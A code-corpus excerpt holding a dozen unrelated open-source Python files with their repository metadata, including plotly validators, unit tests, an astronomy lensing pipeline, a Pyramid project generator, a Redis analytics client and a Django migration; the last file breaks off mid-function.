super(OutsidetextfontValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
data_class_str=kwargs.pop("data_class_str", "Outsidetextfont"),
data_docs=kwargs.pop(
"data_docs",
"""
color
family
HTML font family - the typeface that will be
applied by the web browser. The web browser
will only be able to apply a font if it is
available on the system which it operates.
Provide multiple font families, separated by
commas, to indicate the preference in which to
apply fonts if they aren't available on the
system. The Chart Studio Cloud (at
https://chart-studio.plotly.com or on-premise)
generates images on a server, where only a
select number of fonts are installed and
supported. These include "Arial", "Balto",
"Courier New", "Droid Sans",, "Droid Serif",
"Droid Sans Mono", "Gravitas One", "Old
Standard TT", "Open Sans", "Overpass", "PT Sans
Narrow", "Raleway", "Times New Roman".
size
""",
),
**kwargs
)
|
[
"[email protected]"
] | |
7a3131ae28be4405ce5a794b47ed688f2fecf0cb
|
71b11008ab0455dd9fd2c47107f8a27e08febb27
|
/04、 python编程/day06/3-code/06-函数的返回值.py
|
7adbf30fba433ca7320decfaec8f19bc9ce11693
|
[] |
no_license
|
zmh19941223/heimatest2021
|
49ce328f8ce763df0dd67ed1d26eb553fd9e7da4
|
3d2e9e3551a199bda9945df2b957a9bc70d78f64
|
refs/heads/main
| 2023-08-25T17:03:31.519976 | 2021-10-18T05:07:03 | 2021-10-18T05:07:03 | 418,348,201 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 478 |
py
|
# # 我们没有使用过函数 带返回值
# print("hello python")
# # 对于没有返回值的函数,调用方法,直接函数名(参数)
# # len是有返回值的函数
# a = len("hello python") # 会把一个值返回给调用者
# print(a)
# print(len("hello python"))
def my_sum(a, b):
return a + b # 把a + b 的结果,返回给调用者
num1 = my_sum(2, 3) # 这里就是调用my_sum函数,所以num1得到了函数的返回值
print(num1)
print(my_sum(5, 6))
|
[
"[email protected]"
] | |
98d962d303e316845b4a01a0847eb8e0c36ade3c
|
e75a40843a8738b84bd529a549c45776d09e70d9
|
/samples/openapi3/client/petstore/python/test/test_outer_enum.py
|
aa195260019e50c396a5107af8708f89aed3f908
|
[
"Apache-2.0"
] |
permissive
|
OpenAPITools/openapi-generator
|
3478dbf8e8319977269e2e84e0bf9960233146e3
|
8c2de11ac2f268836ac9bf0906b8bb6b4013c92d
|
refs/heads/master
| 2023-09-02T11:26:28.189499 | 2023-09-02T02:21:04 | 2023-09-02T02:21:04 | 133,134,007 | 17,729 | 6,577 |
Apache-2.0
| 2023-09-14T19:45:32 | 2018-05-12T09:57:56 |
Java
|
UTF-8
|
Python
| false | false | 816 |
py
|
# coding: utf-8
"""
OpenAPI Petstore
This spec is mainly for testing Petstore server and contains fake endpoints, models. Please do not use this for any other purpose. Special characters: \" \\ # noqa: E501
The version of the OpenAPI document: 1.0.0
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import unittest
import datetime
import petstore_api
from petstore_api.models.outer_enum import OuterEnum # noqa: E501
from petstore_api.rest import ApiException
class TestOuterEnum(unittest.TestCase):
"""OuterEnum unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testOuterEnum(self):
"""Test OuterEnum"""
inst = OuterEnum("placed")
if __name__ == '__main__':
unittest.main()
|
[
"[email protected]"
] | |
6bbd7506cb05eb4e4065865fdd18cc17fcea1b2b
|
8bccc05fcb3cfc6ed93991927a514a96f53f7ec0
|
/example_extender/add_mention_dummy_extender.py
|
de5c32d684d6884597a818c80c3c1a1b17752451
|
[
"MIT"
] |
permissive
|
afcarl/QuestionAnsweringGCN
|
54101c38549405d65ef22e38fed9e5bd58122ada
|
e9c1987b40a553f0619fa796f692c8880de32846
|
refs/heads/master
| 2020-03-20T10:35:55.729170 | 2018-06-07T11:45:12 | 2018-06-07T11:45:12 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,615 |
py
|
import numpy as np
from example_reader.graph_reader.edge_type_utils import EdgeTypeUtils
class AddMentionDummyExtender:
relation_index = None
vertex_index = None
inner = None
def __init__(self, inner, relation_index, vertex_index):
self.inner = inner
self.relation_index = relation_index
self.vertex_index = vertex_index
self.edge_type_utils = EdgeTypeUtils()
def extend(self, example):
example = self.inner.extend(example)
if not example.has_mentions():
return example
mention_vertices = [None]*len(example.mentions)
mention_edges = [None]*len(example.mentions)
graph_vertex_count = example.count_vertices()
for i, mention in enumerate(example.mentions):
mention_vertices[i] = self.vertex_index.index("<mention_dummy>")
mention.dummy_index = graph_vertex_count + i
mention_edges[i] = [mention.dummy_index,
self.relation_index.index("<dummy_to_mention>"),
mention.entity_index]
mention_vertices = np.array(mention_vertices)
mention_vertex_types = np.array([[0, 0, 1, 0, 0, 0] for _ in mention_vertices], dtype=np.float32)
mention_edges = np.array(mention_edges)
example.graph.add_vertices(mention_vertices, mention_vertex_types)
example.graph.edge_types[self.edge_type_utils.index_of("mention_dummy")] = np.arange(len(mention_edges), dtype=np.int32) + example.graph.edges.shape[0]
example.graph.add_edges(mention_edges)
return example
|
[
"[email protected]"
] | |
b6df2c47c2e660f59205c497b027827cc1e83442
|
52e83d67c8b76f83278b61a4c0787abebfa2423c
|
/DeepLense/Shubham Jain/pipelines/beginner/features/redshifts_lens_and_source.py
|
f7fbc9325206394e42474457af943383399ac661
|
[] |
no_license
|
mlsft/gsc_tasks-
|
3935142c93cebc978ff35e3f37486438c4dceeed
|
84b62aa04f2333d26f8f95a7c0b24c3922bac647
|
refs/heads/master
| 2022-04-13T16:22:18.054908 | 2020-04-14T11:59:45 | 2020-04-14T11:59:45 | 249,394,940 | 2 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,271 |
py
|
import autofit as af
import autolens as al
### PIPELINE DESCRIPTION ###
# In this pipeline, we'll demonstrate passing redshifts to a pipeline - which means that the results and images of this
# pipeline will be returned in physical unit_label (e.g. lengths in kpcs as well as arcsec, luminosities in magnitudes,
# masses in solMass, etc).
# The redshift of the lens and source are input parameters of all pipelines, and they take default values of 0.5 and
# 1.0. Thus, *all* pipelines will return physical values assuming these fiducial values if no other values are
# specified. Care must be taken interpreting the distances and masses if these redshifts are not correct or if the
# true redshifts of the lens and / or source galaxies are unknown.
# We'll perform a basic analysis which fits a lensed source galaxy using a parametric light profile where
# the lens's light is omitted. This pipeline uses two phases:
# Phase 1:
# Description: Fit the lens mass model and source light profile using x1 source.
# Lens Mass: EllipticalIsothermal + ExternalShear
# Source Light: EllipticalSersic
# Prior Passing: None
# Notes: Inputs the pipeline default redshifts where the lens has redshift 0.5, source 1.0.
# Phase 1:
# Description: Fit the lens and source model again..
# Lens Mass: EllipticalIsothermal + ExternalShear
# Source Light: EllipticalSersic
# Prior Passing: Lens mass (model -> phase 1), source light (model -> phase 1)
# Notes: Manually over-rides the lens redshift to 1.0 and source redshift to 2.0, to illustrate the different results.
def make_pipeline(phase_folders=None, redshift_lens=0.5, redshift_source=1.0):
### SETUP PIPELINE & PHASE NAMES, TAGS AND PATHS ###
# We setup the pipeline name using the tagging module. In this case, the pipeline name is not given a tag and
# will be the string specified below. However, its good practise to use the 'tag.' function below, incase
# a pipeline does use customized tag names.
pipeline_name = "pipeline__feature"
pipeline_tag = "redshifts"
# Unlike other features, the redshifts of the lens and source do not change the setup tag and phase path. Thus,
# our output will simply go to the phase path:
# phase_path = 'phase_name/setup'
# This function uses the phase folders and pipeline name to set up the output directory structure,
# e.g. 'autolens_workspace/output/pipeline_name/pipeline_tag/phase_name/phase_tag//'
phase_folders.append(pipeline_name)
phase_folders.append(pipeline_tag)
### PHASE 1 ###
# In phase 1, we fit the lens galaxy's mass and one source galaxy, where we:
# 1) Use the input value of redshifts from the pipeline.
mass = af.PriorModel(al.mp.EllipticalIsothermal)
mass.centre_0 = af.GaussianPrior(mean=0.0, sigma=0.1)
mass.centre_1 = af.GaussianPrior(mean=0.0, sigma=0.1)
phase1 = al.PhaseImaging(
phase_name="phase_1__x1_source",
phase_folders=phase_folders,
galaxies=dict(
lens=al.GalaxyModel(
redshift=redshift_lens, mass=mass, shear=al.mp.ExternalShear
),
source_0=al.GalaxyModel(
redshift=redshift_source, sersic=al.lp.EllipticalSersic
),
),
)
phase1.optimizer.const_efficiency_mode = True
phase1.optimizer.n_live_points = 80
phase1.optimizer.sampling_efficiency = 0.2
### PHASE 2 ###
# In phase 2, we fit the lens galaxy's mass and two source galaxies, where we:
# 1) Use manually specified new values of redshifts for the lens and source galaxies.
phase2 = al.PhaseImaging(
phase_name="phase_2__x2_source",
phase_folders=phase_folders,
galaxies=dict(
lens=al.GalaxyModel(
redshift=1.0,
mass=phase1.result.model.galaxies.lens.mass,
shear=phase1.result.model.galaxies.lens.shear,
),
source=al.GalaxyModel(
redshift=2.0, sersic=phase1.result.model.galaxies.source.sersic
),
),
)
phase2.optimizer.const_efficiency_mode = True
phase2.optimizer.n_live_points = 50
phase2.optimizer.sampling_efficiency = 0.3
return al.PipelineDataset(pipeline_name, phase1, phase2)
|
[
"[email protected]"
] | |
4856bde0b0b864ee66218ab2cf5abb1934f118c2
|
27bdcba25df8b2416783d8a1229bfce08dc77189
|
/tests/util/httpretty/test_decorator.py
|
d2ccd74525dfd97109047417dea28c64ee280b8a
|
[
"Apache-2.0"
] |
permissive
|
BenjamenMeyer/stackInABox
|
5fbeab6aac38c52d5360f9dbabb9101447e32eb5
|
15586e61a2013b6f4997c652e8412a1784f8fc93
|
refs/heads/master
| 2022-04-01T01:04:33.103603 | 2021-01-09T05:52:55 | 2021-01-09T05:52:55 | 30,074,880 | 5 | 2 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,522 |
py
|
"""
Stack-In-A-Box: Basic Test
"""
import collections
import sys
import types
import unittest
import requests
from stackinabox.util.httpretty import decorator
from tests.util import base
from tests.utils.services import AdvancedService
from tests.utils.hello import HelloService
@unittest.skipIf(sys.version_info >= (3, 0), "Httpretty not supported by Py3")
class TestHttprettyBasicWithDecoratorErrors(base.UtilTestCase):
    """Error paths of the httpretty decorator helpers."""
    def test_basic(self):
        # process_service() must reject an object that is not a service.
        decor_instance = decorator.activate('localhost')
        with self.assertRaises(TypeError):
            decor_instance.process_service({}, raise_on_type=True)
    @decorator.stack_activate('localhost', HelloService())
    def test_deprecated(self):
        # stack_activate is the older alias of activate; it must still
        # stub out the HelloService endpoint.
        res = requests.get('http://localhost/hello/')
        self.assertEqual(res.status_code, 200)
        self.assertEqual(res.text, 'Hello')
@unittest.skipIf(sys.version_info >= (3, 0), "Httpretty not supported by Py3")
class TestHttprettyBasicWithDecorator(base.UtilTestCase):
    """Happy-path usage of decorator.activate with a single HelloService."""
    @decorator.activate('localhost', HelloService())
    def test_basic(self):
        res = requests.get('http://localhost/hello/')
        self.assertEqual(res.status_code, 200)
        self.assertEqual(res.text, 'Hello')
    @decorator.activate('localhost', HelloService(),
                        200, value='Hello')
    def test_basic_with_parameters(self, response_code, value='alpha'):
        # Extra args given to the decorator are forwarded to the test method.
        res = requests.get('http://localhost/hello/')
        self.assertEqual(res.status_code, response_code)
        self.assertEqual(res.text, value)
    @decorator.activate('localhost', HelloService(),
                        200, value='Hello',
                        access_services="stack")
    def test_basic_with_stack_acccess(self, response_code, value='alpha',
                                      stack=None):
        # access_services exposes the registered services dict via the
        # 'stack' keyword argument.
        res = requests.get('http://localhost/hello/')
        self.assertEqual(res.status_code, response_code)
        self.assertEqual(res.text, value)
        self.assertEqual(len(stack), 1)
        # self.hello_service is provided by the base.UtilTestCase fixture.
        self.assertTrue(self.hello_service.name in stack)
        self.assertIsInstance(stack[list(stack.keys())[0]], HelloService)
@unittest.skipIf(sys.version_info >= (3, 0), "Httpretty not supported by Py3")
class TestHttprettyAdvancedWithDecorator(base.UtilTestCase):
    """Exercises AdvancedService routing: sub-paths, query args, regex routes."""
    @decorator.activate('localhost', AdvancedService())
    def test_basic(self):
        res = requests.get('http://localhost/advanced/')
        self.assertEqual(res.status_code, 200)
        self.assertEqual(res.text, 'Hello')
        res = requests.get('http://localhost/advanced/h')
        self.assertEqual(res.status_code, 200)
        self.assertEqual(res.text, 'Good-Bye')
        expected_result = {
            'bob': 'bob: Good-Bye alice',
            'alice': 'alice: Good-Bye bob',
            'joe': 'joe: Good-Bye jane'
        }
        # The query string deliberately mixes ';' and '&' separators.
        res = requests.get('http://localhost/advanced/g?bob=alice;'
                           'alice=bob&joe=jane')
        self.assertEqual(res.status_code, 200)
        self.assertEqual(res.json(), expected_result)
        res = requests.get('http://localhost/advanced/1234567890')
        self.assertEqual(res.status_code, 200)
        self.assertEqual(res.text, 'okay')
        # 595/597 are non-standard codes — presumably stackinabox's own
        # diagnostic responses for unmatched routes; confirm against the lib.
        res = requests.get('http://localhost/advanced/_234567890')
        self.assertEqual(res.status_code, 595)
        res = requests.put('http://localhost/advanced/h')
        self.assertEqual(res.status_code, 405)
        res = requests.put('http://localhost/advanced2/i')
        self.assertEqual(res.status_code, 597)
def httpretty_generator():
    """Yield the test services one at a time.

    Must stay a generator function: tests assert isinstance(...,
    types.GeneratorType) on its return value.
    """
    yield HelloService()
@unittest.skipIf(sys.version_info >= (3, 0), "Httpretty not supported by Py3")
class TestHttprettyBasicWithDecoratorAndGenerator(base.UtilTestCase):
    """Same decorator scenarios, but the services are supplied via a generator."""
    def test_verify_generator(self):
        self.assertIsInstance(httpretty_generator(), types.GeneratorType)
    @decorator.activate(
        'localhost',
        httpretty_generator()
    )
    def test_basic(self):
        res = requests.get('http://localhost/hello/')
        self.assertEqual(res.status_code, 200)
        self.assertEqual(res.text, 'Hello')
    @decorator.activate(
        'localhost',
        httpretty_generator(),
        200, value='Hello'
    )
    def test_basic_with_parameters(self, response_code, value='alpha'):
        # Extra args given to the decorator are forwarded to the test method.
        res = requests.get('http://localhost/hello/')
        self.assertEqual(res.status_code, response_code)
        self.assertEqual(res.text, value)
    @decorator.activate(
        'localhost',
        httpretty_generator(),
        200, value='Hello',
        access_services="stack"
    )
    def test_basic_with_stack_acccess(self, response_code, value='alpha',
                                      stack=None):
        # access_services exposes the registered services dict via 'stack'.
        res = requests.get('http://localhost/hello/')
        self.assertEqual(res.status_code, response_code)
        self.assertEqual(res.text, value)
        self.assertEqual(len(stack), 1)
        self.assertTrue(self.hello_service.name in stack)
        self.assertIsInstance(stack[list(stack.keys())[0]], HelloService)
def httpretty_list():
    """Return the test services as a plain list (iterable-input variant)."""
    return [
        HelloService()
    ]
@unittest.skipIf(sys.version_info >= (3, 0), "Httpretty not supported by Py3")
class TestHttprettyBasicWithDecoratorAndList(base.UtilTestCase):
    """Same decorator scenarios, but the services are supplied via a list."""
    def test_verify_list(self):
        # collections.Iterable is a deprecated alias (removed in Py3.10),
        # acceptable here only because this file is Py2-only (see skipIf).
        self.assertIsInstance(httpretty_list(), collections.Iterable)
    @decorator.activate(
        'localhost',
        httpretty_list()
    )
    def test_basic(self):
        res = requests.get('http://localhost/hello/')
        self.assertEqual(res.status_code, 200)
        self.assertEqual(res.text, 'Hello')
    @decorator.activate(
        'localhost',
        httpretty_list(),
        200, value='Hello'
    )
    def test_basic_with_parameters(self, response_code, value='alpha'):
        # Extra args given to the decorator are forwarded to the test method.
        res = requests.get('http://localhost/hello/')
        self.assertEqual(res.status_code, response_code)
        self.assertEqual(res.text, value)
    @decorator.activate(
        'localhost',
        httpretty_list(),
        200, value='Hello',
        access_services="stack"
    )
    def test_basic_with_stack_acccess(self, response_code, value='alpha',
                                      stack=None):
        # access_services exposes the registered services dict via 'stack'.
        res = requests.get('http://localhost/hello/')
        self.assertEqual(res.status_code, response_code)
        self.assertEqual(res.text, value)
        self.assertEqual(len(stack), 1)
        self.assertTrue(self.hello_service.name in stack)
        self.assertIsInstance(stack[list(stack.keys())[0]], HelloService)
|
[
"[email protected]"
] | |
8746be1fd3b410f5feea5dc25408026a13c2840a
|
b5445f9a1f3597472f47df89696465bca7735406
|
/app/program.py
|
fbad7d4d00617fce1af32fa10d72252d695d045e
|
[
"MIT"
] |
permissive
|
mikeckennedy/pyramid-web-builder-python-gui
|
8af5a4dde9ff1bd6173f789464b67bdaba8bd3fa
|
d842e116730e9b0ed9daaf1125e1fb6e2b3ea40e
|
refs/heads/master
| 2021-05-03T11:00:32.390158 | 2018-02-17T16:12:56 | 2018-02-17T16:12:56 | 120,542,873 | 6 | 2 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,867 |
py
|
import cookiecutter.main
import sys
from gooey import Gooey, GooeyParser
from utils import to_project_style
@Gooey(
    program_name='Pyramid app builder',
    program_description='Create a Pyramid web app',
    show_success_modal=False,
    requires_shell=False)
def main():
    """GUI entry point: collect the form values, render the project, report."""
    info = get_user_values()
    proj_dir = build_app(info)
    print("Project created: {}".format(proj_dir))
def get_user_values():
    """Build the Gooey form, parse the GUI-supplied argv and return it.

    Returns an argparse.Namespace with template, project_name,
    template_language and working_dir attributes.
    """
    parser = GooeyParser()
    parser.add_argument(dest='template',
                        metavar='Project type',
                        help="Type of Pyramid project",
                        choices=['Starter', "Talk Python Entrepreneur's", 'SQLAlchemy', 'SubstanceD', 'ZODB'])
    parser.add_argument('project_name',
                        metavar='Project name',
                        help="The user-visible name of your project")
    parser.add_argument(
        dest='template_language',
        metavar='Template language',
        widget='Dropdown',
        choices=["jinja2", "chameleon", "mako"]
    )
    parser.add_argument(
        dest="working_dir",
        metavar='Output directory',
        help='Directory for project',
        widget="DirChooser")
    # Gooey re-invokes the script with the form values placed in argv.
    sysargs = sys.argv[1:]
    args = parser.parse_args(sysargs)
    return args
def template_to_url(template_name: str) -> str:
    """Return the cookiecutter repository URL for a project-type choice.

    :param template_name: one of the 'Project type' choices offered by
        get_user_values().
    :return: git URL of the matching cookiecutter template.
    :raises Exception: if the name is not a known template type.
    """
    # Keys must stay in sync with the 'Project type' choices in
    # get_user_values(). 'ZODB' was offered there but previously had no
    # mapping here, so selecting it crashed with "Unknown template type".
    urls = {
        'Starter': 'https://github.com/Pylons/pyramid-cookiecutter-starter',
        'SQLAlchemy': 'https://github.com/Pylons/pyramid-cookiecutter-alchemy',
        'SubstanceD': 'https://github.com/Pylons/substanced-cookiecutter',
        "Talk Python Entrepreneur's":
            'https://github.com/mikeckennedy/cookiecutter-pyramid-talk-python-starter',
        'ZODB': 'https://github.com/Pylons/pyramid-cookiecutter-zodb',
    }
    try:
        return urls[template_name]
    except KeyError:
        raise Exception("Unknown template type")
def build_app(info):
    """Render the selected cookiecutter template into info.working_dir.

    :param info: argparse.Namespace returned by get_user_values().
    :return: path of the generated project directory.
    """
    template = template_to_url(info.template)
    proj_dir = cookiecutter.main.cookiecutter(
        template,
        no_input=True,
        output_dir=info.working_dir,
        extra_context={
            'project_name': info.project_name,
            'repo_name': to_project_style(info.project_name),
            'template_language': info.template_language,
            "project_slug": to_project_style(info.project_name),
            # The keys below are placeholder defaults — presumably consumed
            # by the Talk Python template; users edit them after generation.
            "contact_name": "Company Name",
            "domain_name": "yourcompany.com",
            "contact_email": "[email protected]",
            "description": "",
            "integrations": "",
            "mailchimp_api": "",
            "mailchimp_list_id": "",
            "outbound_smtp_username": "",
            "outbound_smtp_password": "",
            "outbound_smtp_server": "",
            "outbound_smtp_port": "587",
            "rollbar_access_token": ""
        }
    )
    return proj_dir
if __name__ == '__main__':
    # Exit with main()'s return code (None maps to exit status 0).
    sys.exit(main())
|
[
"[email protected]"
] | |
411345c0f65612ba6ffbc7676affbf602610f570
|
b639cc785f3e548c77090fb8d2bc35d5aebfa27c
|
/tests/test_patterns/test_des.py
|
79d37243bb32adcaed183884512f9af4dcd4d33f
|
[] |
no_license
|
jmcarp/neurotrends
|
92b7c33a0fe7a216af4cbbb5d4d26f8ee051286e
|
724c06f6a31ecfe37780b51038b3367cd501be37
|
refs/heads/master
| 2016-09-05T15:49:35.435697 | 2014-11-02T04:27:21 | 2014-11-02T04:27:21 | 6,889,235 | 6 | 3 | null | 2014-10-19T18:33:44 | 2012-11-27T19:15:19 |
Python
|
UTF-8
|
Python
| false | false | 433 |
py
|
# -*- coding: utf-8 -*-
import pytest
from neurotrends.pattern import des
from . import check_taggers
@pytest.mark.parametrize('input, expected', [
    # Positives
    ('block design', {}),
    ('blocked paradigm', {}),
    ('epoch based', {}),
    ('epoched analysis', {}),
    # PMID 21625502
    ('we used a blocked factorial design', {}),
])
def test_block(input, expected):
    """Each phrase must be matched by the des.block tagger (empty attrs dict)."""
    check_taggers([des.block], input, expected)
|
[
"[email protected]"
] | |
50ed4c1e4c8f3a3d0004a7364916f829ebeb823e
|
e831c22c8834030c22c54b63034e655e395d4efe
|
/171-ExcelSheetColumnNumber.py
|
b0ecffe70dcf519041cda5b5ec7b971faf11ca34
|
[] |
no_license
|
szhmery/leetcode
|
a5eb1a393422b21f9fd4304b3bdc4a9db557858c
|
9fcd1ec0686db45d24e2c52a7987d58c6ef545a0
|
refs/heads/master
| 2023-08-16T00:27:56.866626 | 2021-10-23T07:35:37 | 2021-10-23T07:35:37 | 331,875,151 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 394 |
py
|
class Solution:
def titleToNumber(self, columnTitle: str) -> int:
ans = 0
for char in columnTitle:
num = ord(char) - ord('A') + 1
ans = ans * 26 + num
return ans
if __name__ == '__main__':
    solution = Solution()
    # "FXSHRXW" is the largest 32-bit title: prints 2147483647.
    result = solution.titleToNumber("FXSHRXW")
    print(result)
    # 26*26 + 25 = 701
    result = solution.titleToNumber("ZY")
    print(result)
|
[
"[email protected]"
] | |
f4b2a1dbd9240673bd7048d07490b2712b5479ef
|
4578b30c433510cf370d51475ec11cac9c3de1cb
|
/serpent/analytics_client.py
|
f7cc26e803be8a25bf0c6da550b983ec00c7ca18
|
[
"MIT"
] |
permissive
|
SerpentAI/SerpentAI
|
0a5b2d567b50388722c3a3c5152555ce94256c49
|
00a487dd088c6ca2528d025f3273c0a796efe210
|
refs/heads/dev
| 2023-03-08T14:14:07.171435 | 2020-05-22T22:34:09 | 2020-05-22T22:34:09 | 88,444,621 | 7,216 | 950 |
MIT
| 2020-07-15T00:41:35 | 2017-04-16T21:48:39 |
Python
|
UTF-8
|
Python
| false | false | 1,395 |
py
|
from redis import StrictRedis
from datetime import datetime
from pprint import pprint
from serpent.config import config
import json
class AnalyticsClientError(Exception):
    """Raised when the analytics client is misconfigured (e.g. missing key).

    Derives from Exception rather than BaseException: BaseException is
    reserved for interpreter-level exits (KeyboardInterrupt, SystemExit),
    and subclassing it made this error invisible to ordinary
    ``except Exception`` handlers.
    """
    pass
class AnalyticsClient:
    """Publishes analytics events for one project onto a Redis list.

    Behaviour is driven by config["analytics"]: an optional event whitelist,
    a debug flag (pretty-print events) and a 'broadcast' switch that gates
    the actual Redis push.
    """

    def __init__(self, project_key=None):
        if project_key is None:
            raise AnalyticsClientError("'project_key' kwarg is expected...")
        self.project_key = project_key
        self.redis_client = StrictRedis(**config["redis"])
        analytics_config = config["analytics"]
        self.broadcast = analytics_config.get("broadcast", False)
        self.debug = analytics_config.get("debug", False)
        self.event_whitelist = analytics_config.get("event_whitelist")

    @property
    def redis_key(self):
        # Name of the Redis list the events are pushed onto.
        return f"SERPENT:{self.project_key}:EVENTS"

    def track(self, event_key=None, data=None, timestamp=None, is_persistable=True):
        """Record one event; dropped silently if a whitelist excludes it."""
        if self.event_whitelist is not None and event_key not in self.event_whitelist:
            return
        if timestamp is None:
            timestamp = datetime.utcnow().isoformat()
        event = {
            "project_key": self.project_key,
            "event_key": event_key,
            "data": data,
            "timestamp": timestamp,
            "is_persistable": is_persistable
        }
        if self.debug:
            pprint(event)
        if self.broadcast:
            self.redis_client.lpush(self.redis_key, json.dumps(event))
|
[
"[email protected]"
] | |
cdc62e0661ae30c80e83b7d35e680840195d3461
|
2929a5acbe52994cf2f961ed120374b7b330d074
|
/form5/migrations/0008_auto_20200724_1433.py
|
30b1610c3e20398521e7651d662281109a24371c
|
[] |
no_license
|
orhunakar01/larasolar01
|
a52135747676c587f6dfd98c67bf4c4a323dc448
|
18e12ecd5adc086da56b956a7f8da33f0723c84a
|
refs/heads/master
| 2022-12-04T16:06:32.983099 | 2020-08-26T06:45:03 | 2020-08-26T06:45:03 | 290,418,075 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 434 |
py
|
# Generated by Django 3.0.8 on 2020-07-24 11:33
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated by Django 3.0.8.

    Alters form5.dosya to an indexed FileField; verbose_name is Turkish
    user-facing text ("Attach an invoice PDF") and must stay as-is.
    """
    dependencies = [
        ('form5', '0007_auto_20200724_1430'),
    ]
    operations = [
        migrations.AlterField(
            model_name='form5',
            name='dosya',
            field=models.FileField(db_index=True, upload_to='', verbose_name='Fatura PDF Ekleyiniz.'),
        ),
    ]
|
[
"[email protected]"
] | |
e8bd886a3bdc6cc1e1d74870cc517a83b8118279
|
51885da54b320351bfea42c7dd629f41985454cd
|
/abc198/e.py
|
4bad4cd9760be8cf70992b7142d358622bb251b8
|
[] |
no_license
|
mskt4440/AtCoder
|
dd266247205faeda468f911bff279a792eef5113
|
f22702e3932e129a13f0683e91e5cc1a0a99c8d5
|
refs/heads/master
| 2021-12-15T10:21:31.036601 | 2021-12-14T08:19:11 | 2021-12-14T08:19:11 | 185,161,276 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,109 |
py
|
#
# abc198 e
#
import sys
from io import StringIO
import unittest
from collections import deque
class TestClass(unittest.TestCase):
    """Judge-style tests: feed sample input on stdin, compare stdout."""
    def assertIO(self, input, output):
        # Temporarily swap the std streams so resolve() can be driven
        # exactly like an online-judge run; restore them afterwards.
        stdout, stdin = sys.stdout, sys.stdin
        sys.stdout, sys.stdin = StringIO(), StringIO(input)
        resolve()
        sys.stdout.seek(0)
        # [:-1] drops the trailing newline before comparing.
        out = sys.stdout.read()[:-1]
        sys.stdout, sys.stdin = stdout, stdin
        self.assertEqual(out, output)
    def test_入力例_1(self):
        # AtCoder ABC198-E sample 1.
        input = """6
2 7 1 8 2 8
1 2
3 6
3 2
4 3
2 5"""
        output = """1
2
3
4
6"""
        self.assertIO(input, output)
    def test_入力例_2(self):
        # AtCoder ABC198-E sample 2.
        input = """10
3 1 4 1 5 9 2 6 5 3
1 2
2 3
3 4
4 5
5 6
6 7
7 8
8 9
9 10"""
        output = """1
2
3
5
6
7
8"""
        self.assertIO(input, output)
def resolve():
    """Read the ABC198-E input (colours + tree edges) and build the graph.

    NOTE(review): only graph construction is implemented — the traversal
    that prints the "good" vertices is still missing, so the sample tests
    above cannot pass yet.
    """
    N = int(input())
    C = list(map(int, input().split()))
    AB = [list(map(int, input().split())) for _ in range(N - 1)]
    # Adjacency list: N empty buckets. The original wrote "[[]*N ...]",
    # which looks like an aliasing bug but in fact []*N is just [] — this
    # is the unambiguous spelling of the same thing.
    G = [[] for _ in range(N)]
    for a, b in AB:
        # Convert the 1-based vertex ids to 0-based and add both directions.
        G[a - 1].append(b - 1)
        G[b - 1].append(a - 1)
if __name__ == "__main__":
    # Both body lines were commented out, which left the 'if' with an
    # empty suite — an IndentationError that made the file unrunnable.
    # Run the solution by default; switch to unittest.main() for the tests.
    # unittest.main()
    resolve()
|
[
"[email protected]"
] | |
eed9894019e05eca7b30267d37c17455147ae279
|
52a3beeb07ad326115084a47a9e698efbaec054b
|
/horizon/.venv/lib/python2.7/site-packages/muranodashboard_org/api/packages.py
|
30555b0805e18d567b9299fc0c686cec216987c7
|
[
"Apache-2.0"
] |
permissive
|
bopopescu/sample_scripts
|
3dade0710ecdc8f9251dc60164747830f8de6877
|
f9edce63c0a4d636f672702153662bd77bfd400d
|
refs/heads/master
| 2022-11-17T19:19:34.210886 | 2018-06-11T04:14:27 | 2018-06-11T04:14:27 | 282,088,840 | 0 | 0 | null | 2020-07-24T00:57:31 | 2020-07-24T00:57:31 | null |
UTF-8
|
Python
| false | false | 3,859 |
py
|
# Copyright (c) 2014 Mirantis, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import itertools
from django.conf import settings
import yaml
from muranodashboard import api
from muranodashboard.common import cache
from muranodashboard.dynamic_ui import yaql_expression
def package_list(request, marker=None, filters=None, paginate=False,
                 page_size=20, sort_dir=None, limit=None):
    """List murano packages, optionally paginated.

    :param marker: pagination marker (id of the last item of the previous
        page); merged into the filters sent to the API.
    :param filters: extra API filters; the caller's dict is not modified.
    :return: tuple (packages, has_more_data).
    """
    limit = limit or getattr(settings, 'PACKAGES_LIMIT', 100)
    # Copy so the marker/sort_dir entries added below do not leak back
    # into the caller's filters dict (the original mutated it in place).
    filters = dict(filters) if filters else {}
    if paginate:
        # Ask for one extra item to detect whether another page exists.
        request_size = page_size + 1
    else:
        request_size = limit
    if marker:
        filters['marker'] = marker
    if sort_dir:
        filters['sort_dir'] = sort_dir
    client = api.muranoclient(request)
    packages_iter = client.packages.filter(limit=request_size,
                                           **filters)
    has_more_data = False
    if paginate:
        packages = list(itertools.islice(packages_iter, request_size))
        if len(packages) > page_size:
            # Drop the probe item; its presence proves there is more data.
            packages.pop()
            has_more_data = True
    else:
        packages = list(packages_iter)
    return packages, has_more_data
def apps_that_inherit(request, fqn):
    """Return packages inheriting *fqn*; empty list unless Glare is enabled."""
    if getattr(settings, 'MURANO_USE_GLARE', False):
        return api.muranoclient(request).packages.filter(inherits=fqn)
    return []
def app_by_fqn(request, fqn, catalog=True):
    """Return the first package matching *fqn*, or None if there is none."""
    apps = api.muranoclient(request).packages.filter(fqn=fqn, catalog=catalog)
    try:
        # next() builtin instead of the Python-2-only .next() method;
